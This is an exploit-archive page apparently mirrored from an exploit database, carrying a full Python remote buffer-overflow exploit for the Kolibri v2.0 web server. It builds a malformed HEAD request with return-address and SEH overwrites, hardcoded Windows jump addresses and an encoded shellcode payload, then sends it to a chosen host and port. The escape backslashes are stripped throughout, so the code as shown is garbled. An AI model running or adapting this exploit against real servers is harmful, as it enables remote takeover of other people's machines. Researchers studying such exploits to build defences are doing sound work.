Kolibri v2.0 Buffer Overflow RET + SEH exploit (HEAD)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kolibri v2.0 Buffer Overflow RET + SEH exploit (HEAD)
# Published : 2010-12-26
# Author : TheLeader
# Previous Title : Internet Explorer 8 CSS Parser Exploit
# Next Title : WMITools ActiveX Remote Command Execution Exploit 0day
#!/usr/bin/env python

#     _             ____  __            __    ___
#    (_)____ _   __/ __ / /_____  ____/ /  _/_/ |
#   / // __  | / / / / / //_/ _ / __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / /
# /_//_/ /_/|___/____/_/|_|___/__,_/  / /_/_/ 
#                   Live by the byte     |_/_/ 
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader (gsog2009 [a7] homtail [d0t] com)
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# Bug discovered by Pr0T3cT10n  
# Exploited by TheLeader, Debug
# -----------------------------------
# Description:
#
# Kolibri v2.0 is vulnerable to a remote buffer overflow attack.
# By sending a malformed HEAD request, we are able to overwrite both the return address and an SEH handler.
# Null bytes terminate the request though, but we are able to partially overwrite with a pointer to 
# a POP + POP + RET instruction inside kolibri.exe and gain control over the execution via SEH.
# This although gets complicated because the SEH handler offset between XP/2K3 and Vista/W7 is different
# by 2 bytes (probably due to local stack variables), thus we are able to cover only 2 operating system with the SEH overwrite exploit.
#
# In order to successfully exploit the RET overwrite, we need to either overwrite ret with jmp to the stack
# and then overwrite the stack with our shellcode, or find another way to get to our shellcode. Since null
# terminates the request string, it is impossible to pratially overwrite RET with an address from the binary
# and then overwrite with shellcode. We attempted finding another reliable way to get to our shellcode but haven't succeeded.
# The most reasonable option left is to overwrite RET with an OS specific address from a DLL that gets loaded by Kolibri.
# -----------------------------------
#
# Exploit Title: Kolibri v2.0 Buffer Overflow RET + SEH exploit (HEAD)
# Date: 24/12/2010
# Author: TheLeader
# Affected Version: Kolibri-2.0
# Tested on: Windows 7 x86 ENG/HEB , Windows Server 2003 SP2 ENG, Windows XP SP3 ENG
# ISRAEL, NULLBYTE.ORG.IL

import socket
import sys

print "n  Kolibri v2.0 Buffer Overflow RET + SEH exploit"

usage = (
"  Usage: kexploit.py host port [mode]nn"
"  Modes:n"
"    1 - RET = XP SP3 ENG, SEH = VISTA + WIN7 (default)n"
"    2 - RET = SERVER2003 SP2 ENG, SEH = VISTA + WIN7n"
"    3 - RET = XP SP3 ENG, SEH = XP + SERVER2003n"
"    4 - RET = SERVER2003 SP2 ENG, SEH = XP + SERVER2003n"
)

if len(sys.argv) < 3:
	print usage
	sys.exit(0)

host = sys.argv[1]

try:
	port = int(sys.argv[2])
except ValueError:
	print "  [-] Error: port must be numeric!"
	sys.exit(1)

if len(sys.argv) > 3:
	try:
		mode = int(sys.argv[3])
	except ValueError:
		print "  [-] Error: mode must be numeric!"
		sys.exit(1)
else:
	mode = 1

# ret offsets = 213, 515
ret_offset = 515

seh_offset_xp_2k3 = 792 # WINXP / WS2K3
seh_offset_vista_7 = 794 # VISTA / WIN7

# badchars = [0x00, 0x0d, 0x0a, 0x20, 0x3d, 0x3f]
shellcode = (
"xb8xe2x96x27xb0x33xc9xdaxdexd9x74x24xf4x5b"
"xb1x32x31x43x10x83xebxfcx03xa1x9axc5x45xd9"
"x4bx80xa6x21x8cxf3x2fxc4xbdx21x4bx8dxecxf5"
"x1fxc3x1cx7dx4dxf7x97xf3x5axf8x10xb9xbcx37"
"xa0x0fx01x9bx62x11xfdxe1xb6xf1x3cx2axcbxf0"
"x79x56x24xa0xd2x1dx97x55x56x63x24x57xb8xe8"
"x14x2fxbdx2exe0x85xbcx7ex59x91xf7x66xd1xfd"
"x27x97x36x1ex1bxdex33xd5xefxe1x95x27x0fxd0"
"xd9xe4x2exddxd7xf5x77xd9x07x80x83x1axb5x93"
"x57x61x61x11x4axc1xe2x81xaexf0x27x57x24xfe"
"x8cx13x62xe2x13xf7x18x1ex9fxf6xcex97xdbxdc"
"xcaxfcxb8x7dx4ax58x6ex81x8cx04xcfx27xc6xa6"
"x04x51x85xacxdbxd3xb3x89xdcxebxbbxb9xb4xda"
"x30x56xc2xe2x92x13x3cxa9xbfx35xd5x74x2ax04"
"xb8x86x80x4axc5x04x21x32x32x14x40x37x7ex92"
"xb8x45xefx77xbfxfax10x52xdcx9dx82x3ex23")

ret_xp_sp3 = "x13x44x87x7C" # 0x7C874413 WINXP SP3 JMP ESP @ kernel32.dll
ret_2k3_sp2 = "xC3x3BxF7x76" # 0x76F73BC3 WS2K3 SP2 JMP ESP @ winrnr.dll

if mode == 1:
	ret = ret_xp_sp3
	seh_offset = seh_offset_vista_7
elif mode == 2:
	ret = ret_2k3_sp2
	seh_offset = seh_offset_vista_7
elif mode == 3:
	ret = ret_xp_sp3
	seh_offset = seh_offset_xp_2k3
elif mode == 4:
	ret = ret = ret_2k3_sp2
	seh_offset = seh_offset_xp_2k3

seh = "x67x1ax48" # 0x0045586B @ kolibri.exe POP + POP + RET

nseh="x90x90xebxf7"
jmp_back2 = "xE9x12xFFxFFxFF"

buf = "x41" * (ret_offset)
nops = "x90" * (seh_offset - len(buf + ret + shellcode + jmp_back2 + nseh))

req = ("HEAD /" + buf + ret + nops + shellcode + jmp_back2 + nseh + seh + " HTTP/1.1rn"
"Host: " + host + ":" + str(port) + "rn"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12rn"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
"Accept-Language: he,en-us;q=0.7,en;q=0.3rn"
"Accept-Encoding: gzip,deflatern"
"Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7rn"
"Keep-Alive: 115rn"
"Connection: keep-alivernrn")

print "  [+] Connecting to %s:%d" % (host, port)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

print "  [+] Sending payload.."
s.send(req)
data = s.recv(1024)

print "  [+] Closing connection.."
s.close()

print "  [+] Done!"